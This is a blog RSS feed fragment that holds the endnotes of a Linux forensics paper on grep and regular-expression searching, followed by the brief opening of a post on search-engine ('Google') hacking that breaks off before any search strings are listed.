&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;V Regular expressions composed for tool should never be carted over to  another without significant testing. Taking an EnCase regular expression  keyword search of any significant complexity and using it on grep with  POSIX BRE syntax would be disastrous. There may not even be a warning,  and special characters would likely be taken literally. Evidence loss  would be a likely consequence.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;VI &lt;span style=&quot;color: yellow;&quot;&gt;http://perldoc.perl.org/perlre.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;VII The PCRE manual, available via &amp;amp;#039;man pcre&amp;amp;#039;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;VIII Another simple example of the various forms of regex is seen  regarding delimitation. Expressions are often shown as “[abc]{3}”,  [abc]{3}, and “/[abc]{3}/”, each of which may be correct or incorrect  given the specific tool in use, even among a given standard (i.e. Perl  regex). Because this paper principally deals with a few programs, many  of these nuances are ameliorated, but their presence deserves mention.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;IX This is not intended to imply that it is the only regex format to do  so.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;X Forensic article on Perl syntax in forensics:  &lt;span style=&quot;color: yellow;&quot;&gt;http://blogs.sans.org/computer-forensics/2009/04/17/forensics-and-perl-fu/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XI Any notable exceptions, such as grep without the -P switch, use  patterns that should be comparable with Perl, PCRE, and other formats.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XII &lt;span style=&quot;color: yellow;&quot;&gt;http://www.regular-expressions.info/tutorial.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XIII PHP has a number of functions that allow access and use of MySQL.  PHP and MySQL do not by necessity need to be used together, and the use  of one does not imply the other.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XIV &lt;span style=&quot;color: yellow;&quot;&gt;http://www.regular-expressions.info/php.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XV The reason for discussing PHP in lieu of Perl is solely due to  authorial preference, due to the fact that though PHP uses PCRE, this is  designed to mimic Perl syntax anyway.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XVI  &lt;span style=&quot;color: yellow;&quot;&gt;http://regexlib.com/DisplayPatterns.aspx?cattabindex=4&amp;amp;categoryId=5&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XVII Most searches will probably be for keywords. Even assuming  alternation, these are relatively simple to construct.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XVIII There will obviously be far fewer example regular expressions than  could have been incorporated into such a paper, being as the number of  expressions possibly relevant is limited only by the imagination. These  were primarily withheld on account of a desire for a reasonably terse  discussion about regular expressions in particular instances—books have  been written on the subject which might serve to better elucidate  readers of different expressions of pertinence.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XIX Henceforth I will mostly refer to GNU/Linux as Linux solely to  conserve space and due to habit. See Free as in Freedom for a better  understanding of this distinction.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XX Readers unfamiliar with grep and/or regex should see the glossary of  terms and the synopsis of the grep manual at their representative  sections.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXI Grep doesn&amp;amp;#039;t search through free space/slack space unless  you specify the /dev entry. Doing this is admittedly messy. For a tool  that helps with this see:  &lt;span style=&quot;color: yellow;&quot;&gt;http://www.sleuthkit.org/autopsy/help/grep_lim.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXII This search would be useless except on a live machine or for  testing purposes. To stick to a consistent format, this will assume that  searches are being done on a live system, as opposed to an imaged  system.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXIII Live analysis is beyond this paper&amp;amp;#039;s scope and should not  be attempted without a full understanding of the risks involved.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXIV Note that it would alter it somewhat. For instance, a history entry  would be added to the .bash_history file of a live machine for each  typed line in the Bash shell&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXV  &lt;span style=&quot;color: yellow;&quot;&gt;http://learnlinux.tsf.org.za/courses/build/shell-scripting/ch01s04.html&lt;/span&gt;  is one such helpful source&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXVI &lt;span style=&quot;color: yellow;&quot;&gt;http://en.wikipedia.org/wiki/File_descriptor&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXVII If one cannot afford EnCase, similar testing may be done with FTK  or online at &lt;span style=&quot;color: yellow;&quot;&gt;http://www.gskinner.com/RegExr/&lt;/span&gt; . Also mentionable is  JGSoft products, especially Regex Buddy, which is extremely useful for  developing regular expressions.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXVIII See &lt;span style=&quot;color: yellow;&quot;&gt;http://www.ubuntu.com/GetUbuntu/download&lt;/span&gt; for one very popular  distribution.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXIX If these examples do not work, consider trying a downloadable live  cd of Ubuntu Linux, on which these have been thoroughly tested. I am not  familiar with the differences between Bash and other shells in depth.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXX This is derived from experience and is not necessarily mandatory.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXI Due to the fact that I was unable to tease a clear answer  concerning the precise location of EXIF metadata online, the broad range  of 6-30 characters preceding its occurrence should suffice.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXII This feature was added to FTK 3.0 when “expand compound files” was  checked in the preprocessing selection. I am still unaware of any such  feature for EnCase.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXIII The reason being for this is that Exif metadata can be used to  track down specific information tagged about the picture, such as the  make and model of the camera. Frequently, these things are listed in  readable format upon dumping the contents of a Exif-tagged image;  utilities can parse out the less visible aspects, such as geolocation  and timestamps.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXIV &lt;span style=&quot;color: yellow;&quot;&gt;http://www.regular-expressions.info/email.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXV &lt;span style=&quot;color: yellow;&quot;&gt;http://www.regular-expressions.info/examples.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXVI Fully, what the man page says is as follows : “-P, --perl-regexp  experimental and grep -P may warn of unimplemented features. ”&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXVII I&amp;amp;#039;m quite sure this is a bug. Perhaps one reason for  labeling -P as “experimental” in the man pages.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXVIII A regular expression for credit cards would have little or  nothing to do with crimes such as media piracy. Additionally, any  investigator doing explicit searches for material not related to the  warrant that justified a given seizure of assets may end up jeopardizing  the admissibility of any evidence found therein. So if the reasons why  serious investigators should know how to construct at least basic  regular expression searches has not already become plainly evident,  perhaps now it has. Searching for things not dictated by a search  warrant endangers evidence admissibility.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XXXIX The quotes are actually optional for this expression.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XL This script is most helpful over repeated investigations. It can save  a good deal of typing, depending upon the number of keywords, and since  keywords are saved to a file, they&amp;amp;#039;re reusable.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLI This was done on a small test file, and would likely change a good  deal reflecting this variable. Again, this example is purely  illustrative.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLII The alternations used to get to such large amounts (i.e. 1400+)  were repeated eventually. The best test would be to use all unique  alternations, as grep may somehow parse out repeated (identical)  alternations, but I don&amp;amp;#039;t see this reflected anywhere in the  documentation.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLIII If of value, my script can be used with or without attribution,  and altered by anyone in any way&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLIV This continues to be a serious problem for innocent end-users, as  well as potentially a huge boon for investigators, though the former is  much more likely to realize it than the latter on account of a general  lack of specific interest and procedures in network forensics, while  sniffing is realized to the fullest by criminal elements hoping to find  low-hanging fruit, network traffic transmitted in clear-text.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLV An intriguing issue with this is that oftentimes long lines of  source code (such as is expected in pages that do not separate lines  frequently, but rather mash them together so as to partially obfuscate  the reading of the source) are “[truncated]” under the section  “Line-based text data:”. This issue appears to not easily be resolvable,  and should be considered in cases where full fidelity source code is  desired in sniffing.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLVI Wireshark too is also excellent, and is perhaps even easier to deal  with for users without an intimate knowledge of the console (it is much  more popular, probably due primarily to the GUI). The primary reason  why tshark is being discussed at the expense of the other is that in  many circumstances a GUI will not be available; these are often eschewed  for their unreliability on servers. Tshark will be the only alternative  as Wireshark requires a GUI to operate. Installing additional programs  on a live system is almost universally unacceptable in the typical  forensic context. Assuming that it is permissible, wireshark may be  installed by the command “sudo apt-get install wireshark” (on Ubuntu and  Ubuntu based systems) or “yum install wireshark” (on Red Hat-based  systems). These commands should resolve any dependencies as well. If in  doubt install Wireshark on the non-subject system and sniff traffic via a  hub.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLVII Capture filters are undoubtedly one of the most important features  of a sniffer. The example presented captures all traffic, but as such,  the resultant file can quickly reach huge proportions. Capture filters  help to disregard non-necessary data from being written to the output  file.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLVIII In-house forensics experts might frequently come into gathering  evidence. The following details one such instance where they may be  needed:  &lt;span style=&quot;color: yellow;&quot;&gt;http://blogs.sans.org/computer-forensics/2009/05/07/deconstructing-a-webserver-attack/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;XLIX Hidden folders and other small facts are thrown in throughout this  paper; though extraneous to the paper&amp;amp;#039;s primary focus, these  things become crucial to the minority of readers I imagine could be  ignorant of them.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;L Wine being a software program allowing one to run Windows programs on  Linux.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LI &lt;span style=&quot;color: yellow;&quot;&gt;http://content.hccfl.edu/pollock/unix/findcmd.htm&lt;/span&gt; gives helpful  information concerning the find command&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LII The file signature for PNG images is taken from here:  &lt;span style=&quot;color: yellow;&quot;&gt;http://www.garykessler.net/library/file_sigs.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LIII Commonly referred to as metadata, or data of data. A simple example  of this would be to hash a file and change the file&amp;amp;#039;s name and  verify it once again. The data is unchanged, and the hash remains the  same. The metadata has been changed.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LIVInvolves the use of -xdev, useful for not crossing mount points.  Beyond the scope of this paper, more on this is available here:  &lt;span style=&quot;color: yellow;&quot;&gt;http://forums13.itrc.hp.com/service/forums/questionanswer.do?admit=109447627+1271729811024+28353475&amp;amp;threadId=1285730&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LV A better explaination of this:  &lt;span style=&quot;color: yellow;&quot;&gt;http://linux.about.com/od/commands/a/blcmdl1_findx.htm&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LVI Much more could be said about this. Do a man on xargs to start.  There are numerous resources available online as well.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LVII&lt;span style=&quot;color: yellow;&quot;&gt; http://www.cbtnuggets.com/webapp/product?id=508&lt;/span&gt; Taken from  “Managing Tables and Indexes Part 1”&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LVIII &lt;span style=&quot;color: yellow;&quot;&gt;http://www.dartmouth.edu/~rc/help/faq/permissions.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LIX  &lt;span style=&quot;color: yellow;&quot;&gt;https://www.blackhat.com/presentations/bh-usa-07/Fowler/Presentation/bh-usa-07-fowler.pdf&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Fowler also wrote a book entitled SQL Server Forensic Analysis that  deals with database forensics in depth&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LX The typical directory service can be thought of as a white pages;  specifically, directory services are utilized in instances where reading  is given precedence to writing. Directory services are optimized  databases of sorts for reading over writing. Many applications of  directory services involve user accounts and information associated with  such. Directory services employ the use of LDAP, also associated with  single sign-on capabilities that allow a user to access disparate  aspects (e.g. different areas that require authentication) of a set of  systems without having to authenticate to each of them in turn.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXI More specifically, the commonalities of LDAP syntax should carry  over into other programs. File locations and other aspect of differing  programs will be completely different.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXII This exact search is exemplary only. Barring a very big ldif file,  this search wouldn&amp;amp;#039;t be an effective use of one&amp;amp;#039;s  time.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXIII  &lt;span style=&quot;color: yellow;&quot;&gt;http://www.cyberciti.biz/faq/linux-unix-bsd-xargs-construct-argument-lists-utility/&lt;/span&gt;  Good introduction to the xargs command.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXIV These were taken from &lt;span style=&quot;color: yellow;&quot;&gt; http://packages.ubuntu.com/search?keywords=grep&lt;/span&gt; and is likely not a  comprehensive list.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXV This paper has demonstrated features roughly equivalent to this  program.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXVI Given that the -P switch is built into grep, the use of this tool  was strategically neglected from the larger portion of this paper by  reason of the greater popularity of the standard grep program.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXVII &lt;span style=&quot;color: yellow;&quot;&gt;http://beagle-project.org/Main_Page&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXVIII More information concerning foremost can be found via man  foremost or at &lt;span style=&quot;color: yellow;&quot;&gt;http://foremost.sourceforge.net/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXIX As this is a forensics paper first, and a software development  paper second, I fully expect my code to be unoptimized.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXX I got the splitting of images in part from this article:  http://www.forensicfocus.com/linux-dd-basics&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;LXXI &lt;span style=&quot;color: yellow;&quot;&gt;http://www.cyberciti.biz/howt&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;</description><link>http://amit-spot.blogspot.com/2010/11/linux-forensics-pattern-matching-wh.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVOZIkLL2G4nMzR4Di06fVKLbqJQcI1uhhsXUDmv9Rp2IhDEJUgV5h_NCavC-SetyCWfXrIH6oEL_6RKaBS6-WdPQLsL4kDd6M7J2pBcARlu2gUxlyG6RVPET7CdAIp2OkAnrDKVQjBXI/s72-c/images.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-8258758497217408550</guid><pubDate>Thu, 11 Nov 2010 18:43:00 +0000</pubDate><atom:updated>2011-02-24T04:11:58.482-08:00</atom:updated><title>Google Hacking Codes-</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;2&quot;&gt;&lt;tbody&gt;
&lt;tr style=&quot;color: lime;&quot;&gt;&lt;td class=&quot;light-td&quot; colspan=&quot;2&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgssB0H6M-MaNMWZ-3S5r-4np0IDZb5R9oRdPvB1pFfViyUF1BexZXE8U1Tl8J7euAV0Xy_gGG7sVtaYLtigXi6RlXkU0TRtO-pYkLmR_BbSdG4-vd5d__hf1TXnw9X1jTuNG8-rFUMl50/s1600/google.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgssB0H6M-MaNMWZ-3S5r-4np0IDZb5R9oRdPvB1pFfViyUF1BexZXE8U1Tl8J7euAV0Xy_gGG7sVtaYLtigXi6RlXkU0TRtO-pYkLmR_BbSdG4-vd5d__hf1TXnw9X1jTuNG8-rFUMl50/s1600/google.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;i&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;      &lt;b&gt;&lt;br /&gt;
&lt;/b&gt;     &lt;/span&gt;&lt;/i&gt;    &lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td class=&quot;dark-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 10px;&quot;&gt;&lt;br /&gt;
&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td align=&quot;left&quot; class=&quot;light-td&quot; colspan=&quot;2&quot;&gt;&lt;div align=&quot;left&quot;&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Application security vendor Fortify reported in 2006 that 20 percent to  30 percent of the attacks it recorded as part of a six-month study came  as a result of some form of search engine hacking.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Google is not particularly enamored by the efforts of some of its users  to use its index for malicious gain.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&quot;As part of Google&#39;s efforts to index all of the information online we  find that on occasion malicious executable files become available to  users through Google Web search,&quot; Megan Quinn, a Google spokeswoman,  told internetnews.com. &quot;We deplore these malicious efforts to violate  our users&#39; security.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&quot;When possible, we endeavor to shield our users from these executable  files,&quot; Quinn added. &quot;However we always encourage users to keep their  security software up-to-date to ensure the safest Web surfing  experience.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;But what kind of Codes are available I hear you all ask;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Well here&#39;s just a few of them I&#39;ve found out about. . .&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Interesting Searches…&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* Source http://www.i-hacked.com/content/view/23/42/&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
